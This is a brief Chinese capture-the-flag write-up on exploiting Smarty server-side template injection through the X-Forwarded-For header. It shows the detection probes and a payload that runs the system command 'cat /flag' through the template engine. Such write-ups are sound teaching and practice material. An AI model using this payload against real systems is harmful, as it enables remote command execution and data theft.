最后更新于3年前
Smarty SSTI
flag.php回显了一个IP地址,抓包改XFF,一般这种大概率SSTI
输入{{7*7}}返回49,输入a{*7*}b返回ab,确认是Smarty SSTI
{{7*7}}
a{*7*}b
payload:X-Forwarded-For: {{system("cat /flag")}}
X-Forwarded-For: {{system("cat /flag")}}